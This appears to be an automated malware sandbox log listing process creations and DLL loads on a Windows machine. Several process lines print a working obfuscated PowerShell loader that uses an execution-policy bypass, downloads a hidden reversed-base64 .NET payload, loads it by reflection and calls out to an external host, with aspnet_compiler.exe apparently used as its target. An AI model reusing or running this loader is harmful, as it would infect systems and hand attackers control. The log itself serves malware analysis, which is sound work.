Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tnaq44gy\tnaq44gy.cmdline"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestnetworkwhichgivebestthingsentirelifewith.vbS"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES60DC.tmp" "c:\Users\user\AppData\Local\Temp\tnaq44gy\CSCA55E465C63A145CC9DC9276A53775DB5.TMP"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzZVlpbWFnZVUnKydybCA9IFB1SWh0JysndHBzJysnOicrJy8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbCcrJ2UvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3QnKydHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgUHVJO3NlWXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c2VZaW1hZ2VCeXRlcyA9IHNlWXdlYkNsaWVuJysndC5Eb3dubG9hZERhdGEoc2VZaW1hZ2VVcmwpO3NlWWltYWcnKydlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHNlWWltYWdlQnl0JysnZXMpO3NlWXN0YXJ0RmxhZyA9IFB1STw8QkFTRTY0XycrJ1NUQVJUPj5QdUk7c2VZZW5kRicrJ2xhZyA9IFB1SScrJzw8QkFTRTY0X0VORD4+UHVJO3NlWXN0YXJ0SW5kZXggPSBzZVlpbWFnZVRleHQuSW5kZXhPZignKydzZVlzdGFydEZsYWcpO3NlWWVuZCcrJ0luZGV4ID0gc2VZaW1hZ2VUZXh0LkluZGV4T2Yoc2VZZW5kRmxhZyk7cycrJ2VZc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHNlWWVuZEluZGV4IC1ndCBzZVlzdGFydEluZGV4O3MnKydlWXN0YXJ0SW5kZXggKz0gc2VZc3RhcnRGbGFnLkxlbmd0aDtzZVliYXNlNjRMZW5ndGggPSBzZVllbmRJbmRleCAtIHNlWXN0YXJ0SW5kZXg7c2VZYmFzZTY0Q29tbWFuZCA9JysnIHNlJysnWWltYWcnKydlVCcrJ2V4dC5TdWJzdHJpbmcoc2VZc3RhcnRJbmRleCwnKycgc2VZYmFzZTY0TGVuZ3RoKTtzZVliYXNlNjRSZXZlcnNlZCA9IC1qb2luIChzZVliYXNlNjRDb21tYW5kJysnLlRvQ2hhckFycmF5KCkgMnBPIEZvckUnKydhY2gtT2JqZWN0IHsgc2VZXyB9KVstMS4uLShzZVknKydiYXNlNjRDb21tYW5kLkxlbmd0aCldO3NlWScrJ2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQycrJ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJysnc2VZYmFzZTY0UmV2ZXJzZWQpO3NlWScrJ2xvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsJysnZWN0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChzZVljb21tYW5kQnl0ZXMpO3NlWXZhaU1ldGhvZCA9IFsnKydkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoUHVJVkFJUHVJKTtzZVl2YWlNZScrJ3Rob2QuSW52bycrJ2tlKHNlWW51bGwsIEAoUHVJdHh0LlRHUkZGUlcvMzUvODcxLjQ0LjI3MS43MDEvLycrJzpwdHRoUHVJLCBQdUlkZXNhdGl2YWRvUHVJLCBQdUlkJysnZXNhdGl2YWRvUHVJLCBQdScrJ0lkZXNhdGl2YWRvUHVJLCBQdUlhc3BuZXRfY29tcGlsJysnZXJQdUksIFB1SWRlc2F0aXZhZG9QdUksICcrJ1B1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkbycrJ1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkb1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1STFQdUksUHVJZGVzYXRpdmFkb1B1SSkpOycpLnJFUGxhQ0UoJ1B1SScsW1N0ckluR11bQ0hBUl0zOSkuckVQbGFDRSgnMnBPJywnfCcpLnJFUGxhQ0UoJ3NlWScsJyQnKXwgLiAoKGdWICcqTWRyKicpLm5BbUVbMywxMSwyXS1qT0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('seYimageU'+'rl = PuIht'+'tps'+':'+'//1017.filemail.com/api/fil'+'e/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvSt'+'GrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f PuI;seYwebClient = New-Object System.Net.W'+'ebClient;seYimageBytes = seYwebClien'+'t.DownloadData(seYimageUrl);seYimag'+'eText = [System.Text.Encoding]::UTF8.GetString(seYimageByt'+'es);seYstartFlag = PuI<<BASE64_'+'START>>PuI;seYendF'+'lag = PuI'+'<<BASE64_END>>PuI;seYstartIndex = seYimageText.IndexOf('+'seYstartFlag);seYend'+'Index = seYimageText.IndexOf(seYendFlag);s'+'eYstartIndex -ge 0 -and seYendIndex -gt seYstartIndex;s'+'eYstartIndex += seYstartFlag.Length;seYbase64Length = seYendIndex - seYstartIndex;seYbase64Command ='+' se'+'Yimag'+'eT'+'ext.Substring(seYstartIndex,'+' seYbase64Length);seYbase64Reversed = -join (seYbase64Command'+'.ToCharArray() 2pO ForE'+'ach-Object { seY_ })[-1..-(seY'+'base64Command.Length)];seY'+'commandBytes = [System.C'+'onvert]::FromBase64String('+'seYbase64Reversed);seY'+'loadedAssembly = [System.Refl'+'ection.Assembly]'+'::Load(seYcommandBytes);seYvaiMethod = ['+'dnlib.IO.Home].GetMethod(PuIVAIPuI);seYvaiMe'+'thod.Invo'+'ke(seYnull, @(PuItxt.TGRFFRW/35/871.44.271.701//'+':ptthPuI, PuIdesativadoPuI, PuId'+'esativadoPuI, Pu'+'IdesativadoPuI, PuIaspnet_compil'+'erPuI, PuIdesativadoPuI, '+'PuIdesativadoPuI,PuIdesativado'+'PuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuI1PuI,PuIdesativadoPuI));').rEPlaCE('PuI',[StrInG][CHAR]39).rEPlaCE('2pO','\|').rEPlaCE('seY','$')\| . ((gV 'Mdr').nAmE[3,11,2]-jOIN'')"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe

Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msimtf.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: jscript9.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
